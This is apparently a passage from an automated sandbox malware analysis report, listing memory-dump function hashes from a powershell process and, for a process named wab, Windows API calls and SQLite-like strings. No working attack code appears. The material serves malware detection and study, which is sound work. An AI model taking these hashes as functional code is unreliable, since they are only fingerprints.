                                                        • Instruction Fuzzy Hash: 4B328FB4B012159FEB24CB54C444BAEB7B2FB89308F218199D509AF751CB72ED828F91
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1775396187.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7e40000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 12069ec61018f0f44b8f2d43ed8ce5d36e83a267bd1f3562a04154ddf8e94ec2
                                                        • Instruction ID: e2a67892adf5284c6b0f2f28ab734d79c276b682adeecdf93e3819c62f45a12f
                                                        • Opcode Fuzzy Hash: 12069ec61018f0f44b8f2d43ed8ce5d36e83a267bd1f3562a04154ddf8e94ec2
                                                        • Instruction Fuzzy Hash: 162280B4B01219DFEB24CB54D444B6EB7B2BF85308F24D029D915AB755CB32EC82CB92
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1775396187.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7e40000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9489d97ebd931cbfba88463ed5d7b0b4d2de59c5c9262234ec0c64d80cc80c48
                                                        • Instruction ID: 24256c13087cdc5a1e230aabe27abbd824343b9ff7a43850a637689560d218af
                                                        • Opcode Fuzzy Hash: 9489d97ebd931cbfba88463ed5d7b0b4d2de59c5c9262234ec0c64d80cc80c48
                                                        • Instruction Fuzzy Hash: DE3281B4B412149FE760DB54C854BEAB7B2BB89305F508099D90A6F391CB72ED82CF91
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1775396187.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7e40000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: bda01a75d443b7c3b3ecf1abb31ab5875f4c5679cbddf7ac8afcb564636544f3
                                                        • Instruction ID: e76378b89a1e885eb9a30c955baa6a4fb02b51a8ea002aaca9408ab1e35513bf
                                                        • Opcode Fuzzy Hash: bda01a75d443b7c3b3ecf1abb31ab5875f4c5679cbddf7ac8afcb564636544f3
                                                        • Instruction Fuzzy Hash: F03281B4B01251DFEB20CF94D844BA9B7B2BF8A308F249159D9095B785CB31ED82CF91
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1775396187.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7e40000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 46480fa4ed0f707cd6042369e2fd0fe0b8b22e5b66df087db9aa7ffc82966587
                                                        • Instruction ID: 2ea015017cc7995a5b952e3672e919e00cb0fbc7c052cc5cd4b254c908c1ac49
                                                        • Opcode Fuzzy Hash: 46480fa4ed0f707cd6042369e2fd0fe0b8b22e5b66df087db9aa7ffc82966587
                                                        • Instruction Fuzzy Hash: 96126DB4A02219EFEB24CB44D544A6DF7B2BF85318F24D129E9156B751C732ECC6CB82
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1775396187.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7e40000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 48541dfb4cf80757354005df9c0fbabd5e4cb1450f82d602b19a1f61b0996cf6
                                                        • Instruction ID: 93f1fc36c8db4e02a5880c5cd1f1ddfe1c21419a183d899b4323425560f1b75e
                                                        • Opcode Fuzzy Hash: 48541dfb4cf80757354005df9c0fbabd5e4cb1450f82d602b19a1f61b0996cf6
                                                        • Instruction Fuzzy Hash: 8A128CB4A01215EFEB24CB54D844BADF7B2BF85318F24D029E9156B751C732ED82CB92
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1775396187.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7e40000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 745997581cd3a647470c303cc70c9717d18d1d23cc09a8f9d6b91e5f18da5797
                                                        • Instruction ID: baf4d61b90a35dc8dde56afe9aaf19162e0c1b6062519354b8f3a9e53c19990f
                                                        • Opcode Fuzzy Hash: 745997581cd3a647470c303cc70c9717d18d1d23cc09a8f9d6b91e5f18da5797
                                                        • Instruction Fuzzy Hash: 2A1292B4B012149FE764DB54C854BEAB7B2FF89305F508099D9096F391CB72EE828F91
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1775396187.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7e40000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: dae50f180525433aa0351ea82cf68f29a45395ce6c861bf82921f377e3c929f2
                                                        • Instruction ID: 29ce98bc2890bf6b4b0ffc1cc3cff1c50f08d88115cf4b016eeb480d13f06a1c
                                                        • Opcode Fuzzy Hash: dae50f180525433aa0351ea82cf68f29a45395ce6c861bf82921f377e3c929f2
                                                        • Instruction Fuzzy Hash: E40274B4B002149FE724DB54C444FAEB7B2FB89304F618199D5096F791CB72ED828F92
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1775396187.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7e40000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d73d0cf36197ef659938561768cfc4f2d6739d63d0ec2d1af3b4ad3bc9c0a296
                                                        • Instruction ID: 97abdbd2e1bd57d5fdce8b3b0ab88443e70d281482d295b161ce66d9f3054de4
                                                        • Opcode Fuzzy Hash: d73d0cf36197ef659938561768cfc4f2d6739d63d0ec2d1af3b4ad3bc9c0a296
                                                        • Instruction Fuzzy Hash: 8A0291B4B012149FE760DB54C854BEAB7B2FB89305F518099D9096F391CB72EE828F91
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1775396187.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7e40000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5f76c71c685acaf4b2eb2f1de2b6456d147dad0f5b8dfb7b3bb974347fe2c789
                                                        • Instruction ID: 59e535684d6d56269d9d6bf46342a3473ad21d81ed9c75a93d6457454ed23c08
                                                        • Opcode Fuzzy Hash: 5f76c71c685acaf4b2eb2f1de2b6456d147dad0f5b8dfb7b3bb974347fe2c789
                                                        • Instruction Fuzzy Hash: 12E1C0B4B01204DFE714DBA4D454BAFB7B2AF89309F25C029D4066F395CB75ED828B92
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1775396187.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7e40000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c5fc4bfa6afd48bb220b6bb23e1419465650066191ed8ed5ba266bd69f8d22d8
                                                        • Instruction ID: 6bd8e3afb06f3a94748f86193bd26c93a34aea89dd00561930e7c8ee6f6feb53
                                                        • Opcode Fuzzy Hash: c5fc4bfa6afd48bb220b6bb23e1419465650066191ed8ed5ba266bd69f8d22d8
                                                        • Instruction Fuzzy Hash: ABA18CB53053059FEF244A69A844776B7E6EFC2219F24C0BBD545CB382CB76D881C762
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1775396187.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7e40000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 74502c2006d74b15f1a5456008e517ac04fc2685ce97ac335b2341c59b709e7f
                                                        • Instruction ID: df77dfe3792d9b7fba637813b760fb4358552555e83f6ede217401f213ba6c5a
                                                        • Opcode Fuzzy Hash: 74502c2006d74b15f1a5456008e517ac04fc2685ce97ac335b2341c59b709e7f
                                                        • Instruction Fuzzy Hash: 26E17FB4A01214DFE720DB64C854BEEB7B2BB85305F608099D5096F3A1CB75ADC6CF92
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1775396187.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7e40000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a334db659995057c8c32785f23db4a32fd2a9297a35c4515da0d6c0f16c82746
                                                        • Instruction ID: d2e828034ec405eee19fa6d25e07341ba977175639456b9af9b7a76b3b67110e
                                                        • Opcode Fuzzy Hash: a334db659995057c8c32785f23db4a32fd2a9297a35c4515da0d6c0f16c82746
                                                        • Instruction Fuzzy Hash: C9C1D0B4B01204DFD724DB94D444BAEBBB2AF89309F25C01AD4056F396CB75EC86CB92
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1775396187.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7e40000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 68f934b0759d6cfd78fcf99997413aeb3757a0e373e80261b0b606d1f6f69748
                                                        • Instruction ID: 1ac81c031aeba99019af8719d4809727fc7514d671e1551572f0b993400cb5b0
                                                        • Opcode Fuzzy Hash: 68f934b0759d6cfd78fcf99997413aeb3757a0e373e80261b0b606d1f6f69748
                                                        • Instruction Fuzzy Hash: A19190B0A01205DFEB24CB94D444BAEB7F2BF89318F249069D4056F351CB76ED91CBA2
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1775396187.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7e40000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f02230bbed369bf2ec4b21e34e239b983f6aef85a1030510eabd9b4ad0d0beb6
                                                        • Instruction ID: e5719fb2cc1a5c44681a0e3027f1e55c3bc5bd52255f4656008fb66531848b08
                                                        • Opcode Fuzzy Hash: f02230bbed369bf2ec4b21e34e239b983f6aef85a1030510eabd9b4ad0d0beb6
                                                        • Instruction Fuzzy Hash: 9F718BB2B013129FDB208B79A8403BBB7E2EF89215F14847AC515DB341EB31D991C7A2
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1775396187.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7e40000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 41d88ff51b008ee3b4c53b74f92192a73b5e6316837b13a95e31c381b5b95708
                                                        • Instruction ID: 82b3b24486a3b707e4277da6acc44fb92c3b15fe469f9d2166036d8b93edd316
                                                        • Opcode Fuzzy Hash: 41d88ff51b008ee3b4c53b74f92192a73b5e6316837b13a95e31c381b5b95708
                                                        • Instruction Fuzzy Hash: 199190B0A01205DFDB24CB94D584BAEB7F2BF89318F259459D4056F352CB32ED91CB61
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1775396187.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7e40000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 44a2341db5da88ebd6f90b2c9cd0baa44d4600b6115777d0eb389bcdb19e296b
                                                        • Instruction ID: 8206cc7655ad6219b19f8390f2683c64c3496238876ec78c8d41e5dabb412489
                                                        • Opcode Fuzzy Hash: 44a2341db5da88ebd6f90b2c9cd0baa44d4600b6115777d0eb389bcdb19e296b
                                                        • Instruction Fuzzy Hash: 86815AB4A01205DFDB24CF54D594BAABBF2BF89718F199159D804AB352C732EC82CB61
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1775396187.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7e40000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: cb84621a1a5ce49411222426b2ece7f738be61823de27f48513e63e71e855312
                                                        • Instruction ID: 1e07f93ba66bfef46cec99426ef0ff739cf07f443053c841b15fe4c4d1e1b81e
                                                        • Opcode Fuzzy Hash: cb84621a1a5ce49411222426b2ece7f738be61823de27f48513e63e71e855312
                                                        • Instruction Fuzzy Hash: DE815AB4A01209DFDB24CF54D584BAAB7F2BF89718F18D059D804AB352C732EC82CB61
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1775396187.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7e40000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b7f4bf1930e2196fce5c601030302b9adff982a863a83295dd9c4ab8edd7b7b1
                                                        • Instruction ID: 2ec088d497873136737a61d7f08787b9f31379751db2e176e849729613959dff
                                                        • Opcode Fuzzy Hash: b7f4bf1930e2196fce5c601030302b9adff982a863a83295dd9c4ab8edd7b7b1
                                                        • Instruction Fuzzy Hash: F14127B6B012199BDF149B7598003BEB7A5AFC5214F20813ADC1AEB741DB31DD81C795
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1775396187.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7e40000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5a4170a9188c88783a2ab982c97ba93bef523a2a4aae1e7a074ce52ba214c6ac
                                                        • Instruction ID: 9cbfd8784b92a1366e082cd129df3f78f04506f73604e1352a66434f5a2edb6a
                                                        • Opcode Fuzzy Hash: 5a4170a9188c88783a2ab982c97ba93bef523a2a4aae1e7a074ce52ba214c6ac
                                                        • Instruction Fuzzy Hash: AD4128F1B11212DFDB318E18A9007BA77A2AF89219F0545A9C505EB256C731DD82C7E6
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1775396187.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7e40000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 460789f906d576d9d590afb2b963b1a989094c5c241ecad795304d846a39b16c
                                                        • Instruction ID: b8601e41fed6db242592e38a69c1a6d8336765891ed6d9cc34f7414d2ccabdad
                                                        • Opcode Fuzzy Hash: 460789f906d576d9d590afb2b963b1a989094c5c241ecad795304d846a39b16c
                                                        • Instruction Fuzzy Hash: 6C31C5B4B41214ABE324A7A4C855FAF76A3EFC5305F248024E9026F791CF75DD428BD2
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1775396187.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7e40000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3cf81c35fb1e4b6d01de33c7b7b48f20637c9edd48ed289a51602e3b1e399ed8
                                                        • Instruction ID: bfa748aacef3ca703141e21343f05c7ed928e8c6ca942b2c66d50578add10408
                                                        • Opcode Fuzzy Hash: 3cf81c35fb1e4b6d01de33c7b7b48f20637c9edd48ed289a51602e3b1e399ed8
                                                        • Instruction Fuzzy Hash: 7E21C0B630131DB7EF30567A681077B76D6ABC4609F28847AD109DF386DD76D8C08361
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1775396187.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7e40000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e5e6ea10b0a4b40b4953c14ffb32f88c4a9daa426180044c4f52e38c1093cba9
                                                        • Instruction ID: 3fdee1ce91c1ed10354694a3743e4a2779d924c221549fb24dca9cb702d03eea
                                                        • Opcode Fuzzy Hash: e5e6ea10b0a4b40b4953c14ffb32f88c4a9daa426180044c4f52e38c1093cba9
                                                        • Instruction Fuzzy Hash: D62137F0A01302ABDB245A69EC407BE7BE2BF8A254F044075D905DF292EB75D991C3A2
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1775396187.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7e40000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 67375587ad845c009bab17562bbbc210bd863ee2e828e1bc5b5a0f476b9b6f8c
                                                        • Instruction ID: 96b1582c766ebe0cef1f9267815f2f10e47c093f77af5171f6b75e024a45b226
                                                        • Opcode Fuzzy Hash: 67375587ad845c009bab17562bbbc210bd863ee2e828e1bc5b5a0f476b9b6f8c
                                                        • Instruction Fuzzy Hash: 392138B1A02359DFCF149F7698002A97BB4BF46250F25819ACC15EB352E7349DC4CBE5
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1775396187.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7e40000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3cebf25137ca7c6a5458dab342419f66c7463e43bc4ca6720742f8a2d6a472ad
                                                        • Instruction ID: 0bea6ad592708398803d687ef1f5e514c59499c1f55f44168e295207c7051293
                                                        • Opcode Fuzzy Hash: 3cebf25137ca7c6a5458dab342419f66c7463e43bc4ca6720742f8a2d6a472ad
                                                        • Instruction Fuzzy Hash: 6E21BBB230534977EF30566A5C007B63B95AB81605F1880AAA504DF3C7E979E8C48371
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1775396187.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7e40000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4471479e8059690f04832f51d60169c33cb97c90a71a4e6a841242bc2368f3f1
                                                        • Instruction ID: 248fd2fe5143cc84c416c636126088eae00a52428d0c4c4bd290c67af4ec25e8
                                                        • Opcode Fuzzy Hash: 4471479e8059690f04832f51d60169c33cb97c90a71a4e6a841242bc2368f3f1
                                                        • Instruction Fuzzy Hash: 4F01F77A30121A8BDF1459AAE4006BAB7D6DFC116AF14D03AD945C7346E632D8C5C7A1
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.1775396187.0000000007E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_7e40000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 584a3913bed7d41f6751d29dc0af2e109adf5df94d8de11209de24b86f245c04
                                                        • Instruction ID: 2108930940694c1c8b8ad4272d9396267f2db374b9021a0985f6588530823504
                                                        • Opcode Fuzzy Hash: 584a3913bed7d41f6751d29dc0af2e109adf5df94d8de11209de24b86f245c04
                                                        • Instruction Fuzzy Hash: 6BA002742010009BC644DB54C991814F761EFC5219728C4DDA8198B256CF33ED03DA40
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000003.1849686295.0000000021470000.00000040.00001000.00020000.00000000.sdmp, Offset: 21470000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_3_21470000_wab.jbxd
                                                        Similarity
                                                        • API ID: _memset
                                                        • String ID: :memory:
                                                        • API String ID: 2102423945-2920599690
                                                        • Opcode ID: ecbd95f731513a15f2221c685083a68bb7700c0840e17c56d7d33b6c9ace8e25
                                                        • Instruction ID: b619b45d3ef15a8be73a797a9893148c278f78a4444de37ce0007dfc21c4a042
                                                        • Opcode Fuzzy Hash: ecbd95f731513a15f2221c685083a68bb7700c0840e17c56d7d33b6c9ace8e25
                                                        • Instruction Fuzzy Hash: CD12C0B0A002558FEB11CF28CC80B9ABBB5BF12704F5A81ADD91D9B342DB35DA55CF91
                                                        APIs
                                                        • GetVersionExW.KERNEL32 ref: 21478E33
                                                          • Part of subcall function 21477760: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000114,774D18A0,2147908D,00000000,00000000,774D2EE0), ref: 21477770
                                                          • Part of subcall function 21477760: _malloc.LIBCMT ref: 2147777C
                                                          • Part of subcall function 21477760: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000), ref: 21477796
                                                          • Part of subcall function 21477760: _free.LIBCMT ref: 214777A1
                                                        • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 21478EDB
                                                        • CreateFileW.KERNEL32(00000000,?,00000003,00000000,?,?,00000000), ref: 21478F09
                                                        • CreateFileA.KERNEL32(00000000,?,00000003,00000000,?,?,00000000), ref: 21478F1C
                                                        • GetLastError.KERNEL32 ref: 21478F2B
                                                        • _free.LIBCMT ref: 21478F35
                                                        Strings
                                                        • ed759d5a9edb3bba5f48f243df47be29e3fe8cd7, xrefs: 21478F7B
                                                        • cannot open file at line %d of [%.10s], xrefs: 21478F85
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000003.1849686295.0000000021470000.00000040.00001000.00020000.00000000.sdmp, Offset: 21470000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_3_21470000_wab.jbxd
                                                        Similarity
                                                        • API ID: ByteCharCreateFileMultiVersionWide_free$ErrorLast_malloc
                                                        • String ID: cannot open file at line %d of [%.10s]$ed759d5a9edb3bba5f48f243df47be29e3fe8cd7
                                                        • API String ID: 3782002744-850067789
                                                        • Opcode ID: 43831a0c874461af16725c591080114c83f4c3b268c7661ab88d44b76ec6c1a7
                                                        • Instruction ID: 24699ceccc10608ccf57eb126a6ed8c6904d8153d1a7b78a949510894d03bef4
                                                        • Opcode Fuzzy Hash: 43831a0c874461af16725c591080114c83f4c3b268c7661ab88d44b76ec6c1a7
                                                        • Instruction Fuzzy Hash: 46716EB16083029FD714CF29D885AABB7F5FB98714F004A2DF59DD7380DB34A9058B92
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000003.1849686295.0000000021470000.00000040.00001000.00020000.00000000.sdmp, Offset: 21470000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_3_21470000_wab.jbxd
                                                        Similarity
                                                        • API ID: _memset
                                                        • String ID: BINARY$MATCH$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                        • API String ID: 2102423945-2494281147
                                                        • Opcode ID: ca78a9ee2a674f72e419e60b6828a567b2e7487133ae2b7d1a02070146a56153
                                                        • Instruction ID: 6efdf67f6acf48c7c3ac745972fbb822fa8b65952c7d20b3c680bea91cbd6465
                                                        • Opcode Fuzzy Hash: ca78a9ee2a674f72e419e60b6828a567b2e7487133ae2b7d1a02070146a56153
                                                        • Instruction Fuzzy Hash: 6BA1C2B2A00311ABEF118F24DCD4B873AA9AF16715F180469FD0D9F346DAB5D550CBE1
                                                        APIs
                                                          • Part of subcall function 21479340: GetVersionExW.KERNEL32(?,00000000,?,?), ref: 2147938B
                                                          • Part of subcall function 21479340: GetVersionExW.KERNEL32(?,00000000,?,?), ref: 214793CC
                                                          • Part of subcall function 21479340: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?), ref: 214793EC
                                                          • Part of subcall function 21479340: _malloc.LIBCMT ref: 214793F9
                                                          • Part of subcall function 21479340: _free.LIBCMT ref: 21479408
                                                        • GetVersionExW.KERNEL32(?,?,00000000,?,?), ref: 2147953B
                                                          • Part of subcall function 21477760: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000114,774D18A0,2147908D,00000000,00000000,774D2EE0), ref: 21477770
                                                          • Part of subcall function 21477760: _malloc.LIBCMT ref: 2147777C
                                                          • Part of subcall function 21477760: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000), ref: 21477796
                                                          • Part of subcall function 21477760: _free.LIBCMT ref: 214777A1
                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,00000000,?,?), ref: 21479572
                                                        • _malloc.LIBCMT ref: 2147957A
                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,?,00000000,?,?), ref: 2147959E
                                                        • _free.LIBCMT ref: 214795A5
                                                        • GetVersionExW.KERNEL32(?,?,00000000,?,?), ref: 214795E0
                                                        • GetDiskFreeSpaceW.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,?), ref: 2147962E
                                                        • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,?), ref: 21479663
                                                        • _free.LIBCMT ref: 2147966C
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000003.1849686295.0000000021470000.00000040.00001000.00020000.00000000.sdmp, Offset: 21470000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_3_21470000_wab.jbxd
                                                        Similarity
                                                        • API ID: ByteCharMultiVersionWide_free$_malloc$DiskFreeSpace$FullNamePath
                                                        • String ID:
                                                        • API String ID: 2298454362-0
                                                        • Opcode ID: cb5465207627532b60d504ffddd42ca02f10fb53b53b42177f3a23c77d0d7c9e
                                                        • Instruction ID: 64bec91d74d9c35e95a406f75aba4e527873d844c6dc47132f3a0657d6dc5f9d
                                                        • Opcode Fuzzy Hash: cb5465207627532b60d504ffddd42ca02f10fb53b53b42177f3a23c77d0d7c9e
                                                        • Instruction Fuzzy Hash: 1F41C872A002249FE722DF64CC45FEA77B8EB59720F0006ADE50DDB281EB745B42CB91
                                                        Strings
                                                        • unable to close due to unfinalised statements, xrefs: 214D3D72
                                                        • misuse at line %d of [%.10s], xrefs: 214D3D2C
                                                        • API call with %s database connection pointer, xrefs: 214D3D16
                                                        • invalid, xrefs: 214D3D11
                                                        • ed759d5a9edb3bba5f48f243df47be29e3fe8cd7, xrefs: 214D3D22
                                                        • unable to close due to unfinished backup operation, xrefs: 214D3EA9
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000003.1849686295.0000000021470000.00000040.00001000.00020000.00000000.sdmp, Offset: 21470000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_3_21470000_wab.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: API call with %s database connection pointer$ed759d5a9edb3bba5f48f243df47be29e3fe8cd7$invalid$misuse at line %d of [%.10s]$unable to close due to unfinalised statements$unable to close due to unfinished backup operation
                                                        • API String ID: 0-3901552733
                                                        • Opcode ID: 45ea2bf1e1341add90f2450ddbca86d0c1566120b035ec8753e7afb67afcc0ef
                                                        • Instruction ID: ceb84973ed9c38473aea6b76b6efc51e8387db216fd330042794ed2f43e6cdb5
                                                        • Opcode Fuzzy Hash: 45ea2bf1e1341add90f2450ddbca86d0c1566120b035ec8753e7afb67afcc0ef
